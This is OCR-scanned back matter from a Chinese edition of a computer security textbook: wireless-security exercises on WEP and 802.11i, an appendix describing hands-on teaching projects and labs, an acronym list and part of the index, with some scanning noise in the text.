模式 密码 块 链 消息 完整 码 协议 ) physical layer (物理 层 ) 
distribution system (DS， 分 发 系统 ) pseudorandom function ( 伪 随 机 函数 ) 
extended service set (ESS， 扩 展 服务 集 ) Robust Security Network (RSN， 强 健 安全 网 络 ) 
group keys (组 密 钥 ) Temporal Key Integrity Protocol (TKIP, ， 临 时 密 铂 
independent BSS (IBSS， 独 立 基本 服务 集 ) 完整 性 协议 ) 
logical link control (LLC， 逻 辑 链 路 控制 ) Wi-Fi Protected Access (WPA, Wi-Fi 保护 访问 ) 
medium access control (MAC， 媒 介 访 问 控制 ) Wired Equivalent Privacy (WEP， 有 线 等 效 加 密 ) 
MAC protocol data unit (MPDU, MAC 协议 数据 wireless LAN (WLAN， 无 线 局 域 网 ) 

单元 ) 
复习 题 
24.1 802.11 无 线 局 域 网 的 基本 结构 单元 是 什么 ? 


24.2 
24.3 
24.4 
24.5 
24.6 
24.7 
24.8 


习题 


24.1 


24.2 


定义 一 个 扩展 服务 集 。 

列 出 并 简要 定义 IEEE 802.11 服务 。 

分 发 网 络 是 无 线 网 络 吗 ? 

与 移动 性 相关 的 关联 的 概念 是 什么 ? 

IEEE 802.11i 所 负责 的 安全 区 域 有 哪些 ? 
简要 描述 IEEE 802.11i 操作 流程 的 4 个 阶段 。 
TKIP 和 CCMP 的 区 别 是 什么 ? 


在 IEEE 802.11 中 ， 开 放 系统 认证 过 程 包含 两 次 通信 。 认 证 是 由 客户 请 求 的 ， 包 含 了 工作 站 ID 

(一 般 是 MAC 地 址 ) 。 随 后 的 通信 是 由 接 人 点 或 者 路 由 器 发 回 的 认证 响应 ， 其 中 包含 成 功 或 失 

败 消 息 。 如 果 客 户 端的 MAC 地 址 在 接 人 点 配置 的 认证 列表 中 明确 标记 为 拒绝 ， 则 表明 请 求 

失败 。 

a. 该 认证 方案 的 优势 有 哪些 ? 

b. 该 认证 方案 的 安全 弱点 有 哪些 ? 

在 IEEE 802.11i 引 入 之 前 ，IEEE 802.11 的 安全 方案 是 有 线 等 效 加 密 ( WEP)。WEP 假设 所 有 在 同 

一 个 网 络 中 的 设备 共享 一 个 私 钥 。 认 证 过 程 的 目的 是 让 工作 站 证 明 自 己 具 有 该 私 铀 。 认 证 过 程 如 

图 24-13 所 示 ， 工 作 站 向 接 人 点 发 出 认证 请 求 消息 ， 接 人 点 发 出 一 个 认证 挑战 ， 它 是 由 128 个 随机 

比特 组 成 的 文本 序列 。 工 作 站 用 私 钥 加 密 该 挑战 ， 将 其 传 回 到 接 人 点 。 接 人 点 解密 ， 并 与 之 前 发 

出 的 挑战 相 比较 。 如 果 完 全 匹配 ， 接 人 点 会 确认 认证 成 功 。 

a. 该 认证 方案 的 优势 有 哪些 ? 

b. 该 认证 方案 是 不 完整 的 。 缺 少 了 什么 重要 内 容 ? 为 什么 ? 提示 : 用 一 到 两 条 附加 消息 可 以 解决 
该 问题 。 

c. 该 方案 的 密码 学 弱点 是 什么 ? 


24.3 


24.4 


#B24¢ 无 线 网 络 斧 会 S41 


工作 站 BAK 
工作 站 发 送 认 证 请 求 = 
挑战 接 人 点 发 送 包 含 128 位 


pow fee 
工作 站 响应 挑战 的 = 
加 密 版 本 

成 功 接 入 点 解密 挑战 响应 。 


如 果 匹 配 ， 则 发 送 认证 
成 功 消息 


图 24-13 WEP 认证 


对 于 WEP 来 说 ， 数 据 完 整 性 和 数据 机 密 性 由 RC4 流 加 密 算法 来 保证 。MPDU 的 封装 过 程 分 为 下 
H s52: 
1. 发 送 者 选择 初始 向 量 UV) 值 。 
2. 将 77 值 与 WEP 密 钥 连接 起 来 ， 生 成 RC4 的 种 子 密 钥 。 
3. 对 整个 MAC 数据 段 计算 32 位 循环 元 余 校 验 (CRC)， 并 将 校 验 码 附加 到 数据 段 之 后 。CRC ER 
据 链 路 层 协 议 常用 的 错误 校 验 编码 。 在 这 里 ，CRC 用 作 完 整 性 校 验 值 (ICV)。 
4. 将 第 三 步 得 到 的 结果 进行 RC4 加 密 ， 生 成 密 文 块 。 
5. 用 灰 将 密 文 块 构造 成 封装 好 的 MPDU。 
a. 画 一 个 结构 图 来 说 明 封 装 过 程 。 
b. 描述 接收 端 恢复 原文 本 并 计算 完整 性 校 验 的 过 程 。 
c. 画 一 个 结构 图 来 说 明 问 题 b 的 过 程 。 
CRC 作为 完整 性 校 验 的 一 个 潜在 弱点 源 于 它 是 一 个 线性 函数 。 这 意味 着 当 消 息 中 单独 一 个 比特 发 
生变 化 时 可 以 预测 出 CRC 的 哪 一 个 比特 会 发 生变 化 。 此 外 还 可 以 判断 出 再 翻转 哪 一 个 比特 能 够 使 
得 最 终 CRC 保持 不 变 。 这 样 一 条 消息 的 多 种 翻转 组 合 会 得 到 相同 的 CRC 编码 ， 从 而 破坏 了 完整 
性 校 验 的 目的 。 然 而 ， 在 WEP 中 ， 如 果 攻 击 者 不 知道 加 密 密 钥 ， 就 无 法 得 到 明文 文本 。 这 是 否 意 
味 着 完整 性 校 验 值 (ICV) 不 会 受到 比特 翻转 攻击 ? 请 解释 原因 。 
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计算 机 安全 教学 项 目 和 其 他 学 生 练 习 





很 多 教师 都 相信 ， 做 研究 或 者 做 些 实践 项 目 对 学 生 深 刻 理解 计算 机 安全 具有 重要 的 意义 。 
如 果 没 有 实践 ， 学 生 们 就 很 难 掌握 一 些 基本 的 安全 概念 及 这 些 概念 之 间 的 相互 关系 。 实 践 项 目 
能 够 使 学 生 加 深 对 书本 知识 的 理解 ， 使 学 生 对 密码 学 的 算法 或 者 协议 是 如 何 工 作 的 等 有 非常 直 
WAS TH; 而 且 能 够 激励 学 生 ， 使 他 们 相信 自己 不 仅 理解 ， 而 且 能 够 实现 与 安全 功能 有 关 的 技 
术 细 节 。 

本 书 中 ， 我 们 尽力 表述 清楚 计算 机 安全 的 概念 ， 同 时 也 提供 了 很 多 作业 使 读者 加 深 对 这 
些 概念 的 理解 。 然 而 ， 教 师 们 希望 能 够 将 这 些 作 业 补充 到 实践 项 目 中 。 本 附录 提供 了 一 些 相关 
的 指导 ， 并 在 专 为 本 书 建立 的 教师 资源 中 心 (IRC) 中 对 辅助 资料 进行 了 说 明 。 教 师 可 以 通过 
培 生 (Pearson) 出 版 公司 获取 这 些 指导 信息 。 这 些 辅助 材料 涵盖 了 以 下 11 类 项 目 和 其 他 学 生 
练习 : 

e 黑客 项 目 
实验 室 练 习 项 目 
安全 教育 (SEED) 项 目 
研究 项 目 
编程 项 目 
实际 的 安全 评估 
防火 墙 项 目 
案例 学 习 
阅读 /报告 作业 
写作 作业 
e 计算 机 安全 教学 网 络 广播 


A.1 黑客 项 目 


这 个 项 目的 目标 是 通过 一 系列 步骤 来 人 侵 一 个 公司 的 网 络 系统 。 这 个 公司 被 称 为 极端 安全 
公司 ( Extreme In Security Corporation)。 就 像 它 的 名 字 所 预示 的 那样 ， 这 个 公司 存在 安全 上 的 
漏洞 。 一 个 非常 聪明 的 黑客 能 够 人 侵 到 它 的 网 络 系统 ， 并 盗 取 相关 的 重要 信息 。 在 IRC 中 包 
括 一 些 用 来 建立 一 个 Web 站 点 的 导航 资料 。 而 学 生 们 的 任务 就 是 攻击 这 个 站 点 ， 并 窃取 该 公 
司 将 在 下 周 竞标 某 个 政府 工程 合同 中 的 竞标 价格 。 

学 生 们 要 通过 攻击 这 个 Web 站 点 ， 找 到 一 个 进入 该 公司 内 部 网 络 的 途径 。 每 当 学 生 们 完 
成 一 个 步骤， 他 们 将 会 得 到 进入 下 一 步骤 的 提示 ， 而 且 还 有 等 级 的 提升 ， 直 到 他 们 最 终 到 达 一 
个 要 求 的 等 级 。 

这 个 项 目 可 以 用 以 下 3 种 方式 尝试 : 

1. 不 能 寻求 任何 形式 的 帮助 ; 

2. 可 以 使 用 项 目 中 的 提示 ; 

3. 使 用 准确 的 说 明 。 

IRC 中 包含 有 该 项 目 所 需 的 一 些 文件 : 
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1. Web 安全 项 目 ， 命 名 为 extremeinsecure (extremeinsecure.zip) o 

2. Web 黑客 攻击 练习 (XSS 和 脚本 攻击 )， 分 别 包含 客户 端 和 服务 器 端的 漏洞 利用 方法 
(webhacking.zip ) 。 

3. 以 上 软件 的 安装 和 使 用 说 明文 档 (description.doc)。 

4. 一 个 描述 Web 站 点 人 侵 的 ppt 讲稿 文档 ( Web_Security.ppt)。 这 个 文档 清楚 地 阐明 了 如 
何 进 行人 侵 操作 ， 这 对 理解 如 何 使 用 这 些 练习 非常 重要 ， 因 为 其 中 还 使 用 了 一 些 直 观 的 截屏 。 

这 个 项 目 是 由 达科他 州 州立 大 学 的 Sreekanth Malladi 教授 设计 的 。 


A2 实验 室 练习 项 目 


普度 大 学 的 Sanjay Rao 教授 和 Ruben Torres 教授 准备 了 一 套 实 验 室 练习 方案 ， 包 含 在 IRC 
中 。 这 些 实现 项 目 是 基于 Linux 平台 设计 的 ， 但 也 适用 于 任何 UNIX 平台。 这 些 实验 室 练习 项 
目 提 供 了 在 实现 安全 功能 和 应 用 中 的 真实 的 实际 体验 。 


A3 安全 教育 (SEED) MA 


SEED 项 目 是 一 系列 需要 动手 的 练习 或 者 实验 ， 包 括 范围 很 广 的 安全 主题 。 这 是 由 锡 拉 丘 
ZZK (Syracuse University) 的 Wenliang Du 教授 为 其 他 教师 所 设计 的 [DU11]。SEED 实验 项 
目的 设计 不 需要 专门 的 实体 的 实验 室 ， 也 不 需要 配备 专门 的 设备 。 所 有 的 SEED 实验 都 可 以 在 
学 生 自己 的 个 人 电脑 上 或 普通 的 机 房 中 完成 。 这 个 系列 包括 如 下 三 类 实验 练习 ; 

e 漏洞 与 攻击 实验 : 这 12 个 实验 涵盖 了 许多 常见 的 漏洞 和 攻击 行为 。 在 每 一 个 实验 当中 ， 
学 生 将 面 对 一 个 包含 隐藏 漏洞 的 系统 (或 程序 )。 根 据 一 些 提示 线索 ， 学 生 必 须发 现 这 
些 漏 洞 ， 然 后 设计 一 些 策 略 来 利用 这 些 漏 洞 。 学 生 们 也 需要 论证 防御 攻击 方法 的 正确 
性 ， 评 价 当 前 通常 的 补救 措施 和 它们 的 效果 。 
探究 实验 : 这 9 个 实验 的 目标 是 通过 观察 、 操 作 和 探究 来 提高 学 生 的 学 习 能 力 ， 使 他 
们 能 够 理解 实际 系统 中 的 安全 原理 ， 同 时 学 生 也 获得 了 应 用 计算 机 安全 原理 来 分 析 并 
评估 系统 的 机 会 。 
设计 与 实现 实验 : 在 安全 教育 中 ， 学 生 应 该 有 机 会 应 用 安全 原理 来 设计 和 实现 一 些 系 
统 。 有 意义 的 设计 任务 一 般 需 要 很 长 时 间 ， 但 却 具 有 很 大 的 挑战 性 ， 而 这 一 系列 的 9 
个 实验 正好 能 满足 这 个 需求 。 

K A-1 提供 了 SEED 库 中 与 书 中 相关 章节 对 应 的 30 个 实验 ， 以 及 学 生 完 成 实验 所 需要 的 
周 数 (假设 每 周 用 10 小 时 完成 实验 工作 )。 


表 A-1 SEED 实验 与 书 中 章节 的 关系 表 







缓冲 区 溢出 漏洞 








返回 库 函 数 攻击 
格式 化 字符 串 漏洞 
漏洞 与 攻击 实验 í 
(基于 Linux 系统 ) 


Set-UID 设置 程序 漏洞 
改变 根 目 录 沙 盒 漏 洞 


伪造 跨 站 请 求 攻击 
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依据 章节 顺序 组 织 的 上 述 实验 的 链接 ， 可 以 在 教材 配套 网 站 ， 通 过 教师 资源 链接 ( 即 
williamstallings.com/ComputerSecurity) 进行 访问 。 每 个 实验 包括 学 生 指导 、 相 关 文 献 和 一 些 实 
验 需要 的 软件 。 而 且 ， 这 个 网 站 还 为 教师 提供 了 一 个 链接 ， 用 于 获取 教师 手册 。 


A.4 研究 项 目 


进行 一 项 研究 项 目 ， 不 仅 可 以 使 学 生 加 深 对 课堂 所 学 概念 的 理解 ， 而 且 能 够 教 给 学 生 一 
些 研 究 技能 。 这 些 项 目 通常 是 文献 研究 ， 还 包括 通过 互联 网 调查 相关 供应 商 产品 、 实 验 室 研究 
活动 和 一 些 致力 于 标准 化 的 工作 。 这 些 项 目 可 以 由 一 个 小 组 承担 ， 对 于 比较 小 的 项 目 ， 也 可 以 
分 配给 个 人 。 无 论 是 哪 一 种 情况 ， 最 好 是 能 够 提早 把 小 组 的 研究 计划 书 拿 给 指导 教师 ， 这 样 教 
师 才 有 充分 的 时 间 来 评估 项 目的 主题 和 难度 是 否 适合 学 生 。 学 生 提交 的 研究 项 目 应 该 包括 以 下 
内 容 : 

© 研究 计划 书 的 格式 

© 最 终 报告 的 格式 

e 中 期 和 最 终结 题 的 时 间 表 
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e 项 目 可 能 的 主题 列表 

学 生 们 可 以 从 IRC 提供 的 主题 列表 中 选择 一 个 ， 也 可 以 自己 设计 提出 合适 的 项 目 。 在 教 
师 的 补充 材料 中 ， 包 括 了 研究 计划 书 的 建议 格式 和 最 终 报告 的 格式 ， 还 列 出 了 一 些 可 能 的 研 
究 主题 。 

教师 补充 材料 中 的 研究 和 编程 项 目 是 由 以 下 这 些 人 建议 和 提供 的 : Henning Schulzrinne ( 哥 
伦比 亚 大 学 )、Cetin Kaya Koc (俄勒冈 州立 大 学 )、David M. Balenson (可 信 信 息 系 统 公司 和 乔 
治 … 华盛顿 大 学 )、Dan Wallach (MTA) 和 David Evans (弗吉尼亚 大 学 )。 


A.5 ”编程 项 目 


编程 项 目 是 非常 有 用 的 教学 工具 。 独 立 完成 一 个 编程 项 目 ， 而 这 个 项 目 并 非 是 现 有 安全 工 
具 的 一 部 分 ， 具 有 如 下 吸引 人 的 特点 : 

1. 教师 可 以 选择 很 多 密码 编码 学 和 网 络 安全 方面 的 概念 来 布置 该 项 目 。 

2. 学生 可 以 在 任何 一 台 机 器 上 用 任何 语言 进行 编程 ; 这些 项 目 是 平台 无 关 和 语言 无 关 的 。 

3. 教师 不 需要 为 学 生 独 立 进行 的 项 目下 载 、 安 装 和 配置 任何 特定 的 基础 环境 。 

对 于 项 目的 大 小 同样 也 没有 什么 限制 。 较 大 的 项 目 可 以 给 学 生 更 多 的 成 就 感 ， 能 力 较 差 或 
者 缺乏 组 织 技能 的 学 生 可 能 会 因此 被 落 在 后 面 。 较 大 的 项 目 通 常会 引导 那些 优秀 的 学 生 投 和 更 
多 的 精力 。 较 小 的 项 目 可 以 着 眼 于 从 概念 到 代码 的 转化 率 ， 就 是 说 在 这 样 的 项 目 中 ， 可 以 更 多 
地 要 求学 生 将 概念 用 代码 实现 或 通过 编程 来 理解 概念 。 而 且 由 于 小 项 目 涉及 的 主题 范围 大 ， 这 
可 以 帮助 学 生 有 机 会 接触 到 更 广 的 知识 领域 。 

就 像 在 研究 项 目 中 要 求 的 那样 ， 学 生 们 也 要 首先 提交 一 份 计划 书 。 学 生 提交 的 内 容 应 该 包 
括 上 一 节 中 所 提 到 的 那些 内 容 。 在 教师 的 补充 材料 中 包含 了 12 个 可 供 选 择 的 编程 项 目 。 

以 下 人 员 提 供 了 IRC 中 建议 的 研究 和 编程 项 目 : Henning Schulzrinne (哥伦比亚 大 学 )、 
Cetin Kaya Koc (俄勒冈 州立 大 学 ) 和 David M. Balenson (可 信 信 息 系 统 公 司 和 乔治 华盛顿 
大 学 )。 


A.6 实际 的 安全 评估 


分 析 一 个 现 有 组 织 的 基础 设施 和 实践 ( 即 其 使 用 情况 ) 是 培养 学 生 安全 评估 技能 的 最 好 途 
径 之 一 。 在 IRC 中 ， 对 需要 进行 的 安全 评估 任务 进行 了 描述 。 学 生 们 可 以 以 个 人 或 者 小 组 为 
单位 ， 选 择 一 个 合适 的 小 型 或 中 型 组 织 或 机 构 。 学 生 们 然后 去 与 该 组 织 的 关键 人 员 见 面 和 交 
流 ， 从 而 能 够 对 安全 风险 评估 做 出 合适 的 选择 并 重新 审查 自己 面临 的 任务 ， 因 为 这 些 都 与 该 
组 织 的 IT 基础 设施 和 实践 有 关 。 最 终 ， 他 们 会 提出 合适 的 改革 意见 来 改善 该 组 织 的 IT 安全 状 
况 。 这 些 活动 能 够 帮助 学 生 们 提高 对 安全 实践 的 认识 ， 以 及 分 析 这 些 实践 并 提出 改善 意见 的 
能 力 。 


A7 BAMA 


网 络 防 火 墙 的 应 用 对 于 初学 的 学 生来 说 是 非常 困难 的 。IRC 中 包含 了 可 视 化 的 网 络 防火 墙 
工具 ， 可 以 用 来 展示 和 教授 网 络 安 全 和 防火 墙 配 置 。 这 个 工具 意 在 教授 并 帮助 学 生 加 深 对 一 些 
关键 概念 的 理解 ， 包 括 边界 防火 墙 的 用 法 和 目的 、 分 隔 的 子 网 的 用 途 、 数 据 包 过 滤 的 目的 和 简 
单数 据 包 过 滤 防 火 墙 的 弱点 等 概念 。 

IRC 中 包含 了 一 个 轻便 的 jar 格式 的 文件 ， 也 包括 了 一 系列 练习 。 这 些 工 具 和 练习 都 是 由 
美国 空军 军官 学 校 开发 的 。 
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A.8 案例 学 习 


拥有 案例 学 习 的 教学 可 以 提高 学 生 的 学 习 积极 性 。IRC 中 包含 了 如 下 几 个 领域 中 的 案例 
学 习 : 
© 灾难 恢复 
© 防火 墙 
e 事件 响应 
e 物理 安全 
e 风险 
e 安全 政策 
e 虚拟 化 
每 个 案例 学 习 都 包括 学 习 目 标 、 案 例 描述 和 一 系列 与 案例 相关 的 讨论 题目 。 每 个 案例 学 习 
都 基于 现实 世界 的 情况 ， 并 且 包 含 一 些 描述 案例 的 论文 或 者 报告 。 
这 些 案例 学 习 的 内 容 是 由 北 卡罗来纳 农工 州立 大 学 ( North Carolina A&T State University) 
开发 的 。 


AQ 阅读 / 报告 作业 


另 一 个 使 学 生 加 深 对 课本 概念 的 理解 且 能 教 给 学 生 研究 经 验 的 有 效 方 法 是 ， 让 学 生 研读 一 
些 需 要 阅读 和 分 析 的 论文 。IRC 中 列 出 了 一 些 可 以 推荐 给 学 生 的 论文 ， 这 些 论文 依据 章节 顺序 
组 织 。 高 级 内 容 Web 站 点 提供 了 这 些 论 文 的 副本 。IRC 中 也 有 关于 如 何 进 行 阅读 的 建议 信息 。 


A10 写作 作业 


写作 作业 对 技术 原理 (如 网 络 安全 ) 的 学 习 有 多 方面 的 效果 。 跨 学 科 写 作 (WAC: Writing 
Across the Curriculum) i224 (http://wac.colostate.edu) 的 拥护 者 声称 ， 写 作对 促进 学 习 非 常 有 
益 。 写 作 可 以 使 人 对 于 特定 主题 有 更 加 细致 和 完整 的 思考 。 另 外 ， 写 作 还 能 够 帮助 学 生 克 服用 
狭隘 的 个 人 眼光 看 问题 的 倾向 ， 就 是 只 了 解 表面 的 现象 或 者 只 学 习 解 决 问 题 的 方法 而 不 广泛 深 

770| 入 地 理解 问题 的 主旨 。 
在 IRC 中 ， 提 供 了 按 章节 组 织 的 很 多 的 写作 作业 。 教 师 最 终 可 能 发 现 ， 这 是 他 们 教学 过 
程 中 最 重要 的 一 个 环节 。 如 果 你 能 对 写作 这 部 分 的 内 容 提 出 反馈 意见 或 者 另外 提供 一 些 写 作 任 

Z, 我 们 将 十 分 感谢 。 


A.11 计算 机 安全 教学 网 络 广 播 


教材 配套 网 站 williamstallings.com/ComputerSecurity (教师 资源 链接 ) 提供 了 一 个 方便 的 网 
络 广播 站 点 目录 ， 以 提高 课程 的 教学 效果 。 教 师 可 以 自己 选择 ,或 者 学 生 也 可 以 自己 选择 一 个 
或 多 个 视频 观看 ， 并 且 写 出 视频 的 分 析 或 者 报告 。 


缩 略 语 


3DES (Triple Data Encryption Standard)， 三 重 数据 加 密 标准 

ABAC (Attribute-Based Access Control)， 基 于 属性 的 访问 控制 

AES (Advanced Encryption Standard)， 高 级 加 密 标 准 

AH (Authentication Header)， 认 证 头 

ANSI (American National Standards Institute)， 美 国 国家 标准 委员 会 
ATM (Automatic Teller Machine)， 自 动 柜员 机 

CBC (Cipher Block Chaining)， 密 码 分 组 链接 

CC (Common Criteria)， 通 用 标准 

CFB (Cipher Feedback)， 密 码 反 馈 

CMAC (Cipher-Based Message Authentication Code)， 基 于 密码 的 消息 认证 码 
DAC (Discretionary Access Control)， 自 主 访问 控制 

DBMS (DataBase Management System)， 数 据 库 管 理 系统 

DDoS (Distributed Denial of Service)， 分 布 式 拒绝 服务 攻击 

DES (Data Encryption Standard)， 数 据 加 密 标准 

DMZ (Demilitarized Zone)， 隔 离 区 

DoS (Denial of Service)， 拒 绝 服务 

DSA (Digital Signature Algorithm )， 数 字 签名 算法 

DSS (Digital Signature Standard)， 数 字 签 名 标准 

ECB (Electronic Codebook)， 电 子 密 码 本 

ESP (Encapsulating Security Payload)， 封 装 安全 载荷 

FIPS (Federal Information Processing Standard)， 联 邦 信息 处 理 标准 
IAB (Internet Architecture Board)，Internet 体系 结构 委员 会 

ICMP (Internet Control Message Protocol), Internet 控制 报 文 协议 
IDS (Intrusion Detection System)， 人 侵 检测 系统 

IETF (Internet Engineering Task Force)，Internet 工程 任务 组 

IP (Internet Protocol), Internet 协议 

IPsec (IP Security), IP 安全 

ISO (International Organization for Standardization)， 国 际 标准 化 组 织 
ITU (International Telecommunication Union)， 国 际 电 信 联 盟 

ITU-T (ITU Telecommunication Standardization Sector), ITU 电信 标准 化 部 门 
IV (Initialization Vector)， 初 始 化 向 量 

KDC (Key Distribution Center)， 密 钥 分 发 中 心 

MAC (Mandatory Access Control)， 强 制 访 问 控制 

MAC (Message Authentication Code)， 消 息 认 证 码 

MIC (Message Integrity Code)， 消 息 完整 性 编码 

MIME (Multipurpose Internet Mail Extension)， 多 用 途 网 际 邮件 扩展 
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MLS (Multilevel Security), LERE 

MTU (Maximum Transmission Unit)， 最 大 传输 单元 

NIDA (Network-Based IDS)， 基 于 网 络 的 IDS 

NIST (National Institute of Standards and Technology)， 美 国 国家 标准 与 技术 委员 会 
NSA (National Security Agency)， 美 国 国家 安全 局 

OFB (Output Feedback)， 输 出 反馈 

PIN (Personal Identification Number)， 个 人 标识 码 

PIV (Personal Identity Verification)， 个 人 身份 认证 

PKI (Public Key Infrastructure)， 公 钥 基 础 设施 

PRNG (Pseudorandom Number Generator)， 伪 随机 数 生 成 器 
RDBMS (Relational Database Management System)， 关 系数 据 库 管理 系统 
RBAC (Role-Based Access Control)， 基 于 角色 的 访问 控制 
RFC (Request for Comments)， 请 求 注释 

RNG (Random Number Generator)， 随 机 数 生成 器 

RSA (Rivest-Shamir-Adelman)，RSA 算法 

SHA (Secure Hash Algorithm)， 安 全 散 列 算法 

SHS (Secure Hash Standard)， 安 全 散 列 标准 

S/MIME (Secure MIME),， 安 全 MIME 

SQL (Structured Query Language)， 结 构 化 查询 语言 

SSL (Secure Sockets Layer)， 安 全 套 接 字 层 

TCP (Transmission Control Protocol)， 传 输 控 制 协议 

TLS (Transport Layer Security)， 传 输 层 安 全 

TPM (Trusted Platform Module)， 可 信 平 台 模 块 

UDP (User Datagram Protocol)， 用 户 数据 报 协议 

VPN (Virtual Private Network)， 虚 拟 专用 网 
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using symmetric encryption (使 用 对 称 加 密 )，48 
Authentication Header (AH， 认 证 头 )，709 
Authentication protocol (认证 协议 )，75-76，95， 
468，734，739，746-747 
challenge-response (挑战 - 应 答 )，92 
Diffie-Hellman key exchange (Diffie-Hellman 密 钥 
交换 )，685-686 
dynamic biometric (动态 生物 特征 )，103 
dynamic password generator (动态 口令 生成 器 )，92 
Extensible Authentication Protocol (EAP， 可 扩展 
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认证 协议 )，746-747，751 
IEEE 802.1X protocol (IEEE 802.1X 协议 )，751，753 
protocol type selection (PTS， 协 议 类 规 选 择 )，92 
of a smart token (智能 令 牌 )，92-93，102 
static biometric (静态 生物 特征 )，103 
Authentication server (AS， 认 证 服务 器 )，717-718 
Authenticators (认证 符 )，104 
Authenticity (H SE 性 )，13-14，22，37，48，50， 
226, 487, 490, 499, 548, 568, 753 
Authorization (424%), 115, 621 
access control and (访问 控制 )，115 
cascading (EK), 170-171 
Automatic response (自动 应 答 )，581 
Automatic teller machine (ATM， 自 动 柜员 机 )，91 
architectures (架构 )，108 
cardholder ( 持 卡 人 )，107 
issuer (发 行人 ， 发 行商 )，107 
processor (处 理 器 )，107-108 
security problems for (安全 问题 )，107-110 
Autonomic enterprise security system (自治 的 企业 安 
全 系统 )，290 
Auto-rooter，201 
Availability (可 用 性 ， 有 效 性 )，5, 7，12-16, 18， 
21-23, 25-26, 35, 37-38, 157, 174-175, 
177, 181, 187-188, 191, 200, 223, 241- 
242, 251, 264, 269, 413-414, 421, 458, 
472, 487, 490, 499, 508-509, 511, 520, 
530-531, 568, 574, 581-582, 591, 611 
Awareness (意识 )，26 
B 
Backdoor (trapdoor)( 后 门 )，20-21，201，214-215， 
226-227, 272, 330 
Background checks and screening of employees ( 雇 
RARE), 563-564 
Backscatter traffic (RUB), DoS, 246, 257 
Backup, data (tt, #8), 426 
Banner grabbing attack (标题 抓 取 攻击 )，288 
Barrier security (屏障 安全 )，739 
Baseline approach (基线 方法 )，493-494 
Baselining (基线 )，603-604 
Base-rate fallacy (32 3iBiR), 274-275 
IDS problem of (IDS 问题 )，274-275 
Basic principles (基本 原则 )，273-274 
Basic service set (BSS， 基 本 服务 集 )，740，742-743 


Bastion host (堡垒 主机 )，315 
Bayesian networks ( 贝 叶 斯 网 络 )，277 
b-bit block of plaintext (b-bit 明文 块 )，48 
Bcrypt，83 
Behavior-blocking software (行为 阻止 软件 )，233 
Bell-LaPadula model for computer security (计算 机 
安全 的 Bell-LaPadula #4), 440-450 
4-tuple(b，M，f，H)( 四 元 组 )，442-444 
abstract operations (操作 抽象 )，444-445 
example of use (使 用 示例 )，445-450 
formal description of model (模型 的 形式 化 描述 )， 
442-444 
general description (一 般 描 述 )，441-442 
limitations (局 限 )，448，450 
Multics, 449-450 
properties (性 能 )，444 
Bernstein, Daniel ( 伯 因 斯坦， 丹尼尔 )，262 
Biba integrity model of computer security (计算 机 安 
全 的 Biba 完整 性 模型 )，451-452 
Billing/payments functions (账单 /支付 功能 )，621 
Biological viruses (生物 学 病毒 )，204 
Biometric authentication system (生物 特征 认证 系 
统 )，105，548-549，551 
accuracy of (准确 性 )，98-100 
cost vs. accuracy (费用 与 准确 性 )，97 
dynamic biometric protocol (动态 生物 特征 协议 )1， 
75, 102-103 
fingerprint patterns (指纹 模式 )，96 
generic (通用 的 )，98 
hand geometry systems ( 手 几何 结构 系统 )，96 
iris system (虹膜 系统 )，97，105-107 
operating characteristic curve (操作 特征 曲线 )， 
99-100 
operation of (操作 )，97-98 
personal identification number ( PIN， 个 人 识别 
码 )，98 
physical characteristics of (物理 特征 ， 实 体 特 征 )， 
96-97 
retinal (视网膜 )，97 
signature (特征 )，97 
static biometric protocol (静态 生物 特征 协议 )， 
75, 102-103 
using facial characteristics (使 用 面部 特征 )，96 
verification (identification) of (确认 (识别 ))，98 


voice pattern (声音 模式 )，97 
Biometric information (生物 特征 信息 )，95 
BIOS code (BIOS 代码 )，222 
Bit-by-bit exclusive-OR (XOR, 3k), 670 
BitLocker, Windows security ( BitLocker, Windows 
安全 )，432 
Bitwise exclusive-OR(XOR )operation( 位 异 或 操作 )， 
47, 652 
Blackhole crimeware toolkit (黑洞 犯罪 软件 套件 )，203 
Blended attack (混合 攻击 )，202 
Blinding ( 盲 的 )，684 
Blind SQL injection (SQL 盲 注入)，167 
Blizzard (暴雪 )，538 
Block cipher encryption (分 组 加 密 算法 )，46 
blowfish symmetric (河豚 对 称 )，83 
Block cipher modes of operation( 分 组 密码 操作 模式 )， 
655-660 
Block ciphers (4} 44 % W), 43, 47, 641, 643, 
647, 651-652, 675 
Block encryption algorithms (分 组 加 密 算法 )，41， 
43-47, 638, 641 
Block reordering (分 组 重组 )，48 
Bloom filter (Bloom 过 滤器 )，88-90 
Blowfish symmetric block cipher (河豚 对 称 分 组 密 
码 )，83 
Blue Pill rootkit 〈( 蓝 药片 rootkit)，229，421 
Boot Block (引导 块 )，466 
Boot ROM (引导 ROM), 466 
Boot sector infector (5| Fi KRY), 208 
Botnet (EF 4%), 202, 219-220, 223, 225, 235- 
236, 250-252, 257 
Bots (F #L), 222-224, 235, 253-254, 318, 632 
uses (使 用 )，223 
Bourne shell, 352, 356-357 
Bring-your-own-device (BYOD) policy ( 自 带 设备 
策略 )，737-738 
Broad network access (广域网 访问 )，181 
Browser helper objects (BHO， 浏 览 器 助手 对 象 )， 
223 
Brunner, John ( 布 鲁 纳 ， 约 翰 )，210 
Brute-force attack ( 蛮 力 攻击 )，43-45，54，85，591，645 
BSD-based systems (基于 BSD 的 系统 )，429 
BSD Syslog Protocol (BSD 系统 日 志 协 议 )，593 
Buffer overflow〔 缓 冲 区 溢出 )，338 
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attacks (IU), 337-338, 342, 348-349, 351-352, 
360, 362-365, 370 
C code (C 代码 )，339 
compile-time defenses (编译 时 防御 )，359-363 
countermeasures (对 策 )，359-365 
definition (定义 )，338 
example runs (实例 运行 )，339 
exploiting method (利用 漏洞 方法 )，341 
exploits (漏洞 利用 )，323 
function call mechanisms (函数 调用 机 制 )， 
343-344 
global data area overflows (全 局 数据 区 溢出 )， 
370-371 
heap ( 堆 )，367-370 
input size and (输入 大 小 )，380 
no-execute (NX， 无 执行 )，364 
replacement stack frame (#F#R#RW1), 365-366 
return to system call (返回 到 系统 调用 )，366-367 
run-time defenses (运行 时 防御 )，363-365 
shellcode, 352-359 
stack (#%), 342-351 
stack values (#2{F), 340 
Buffer overrun (缓冲 区 越界 )， 参 见 Buffer overflow 
BUFSIZ constant (BUFSIZ 常量 )，349 
Bushfire (丛林 大 火 )，541 
Business continuity and disaster recovery (业务 连续 
性 和 灾难 恢复 )，193 
Business-use-only policy ( 仅 用 于 业务 的 策略 )、566 
C 
Calculated code (计算 代码 )，49 
Calling function (调用 函数 )，343-344 
Canary value (Canary 值 )，363 
Canonicalization (规范 化 )，390，411 
Capability (能 力 )，500 
Capability tickets (能 力 权 证 )，118-119，724 
Card access number (CAN， 卡 片 接 人 号 )，93，96 
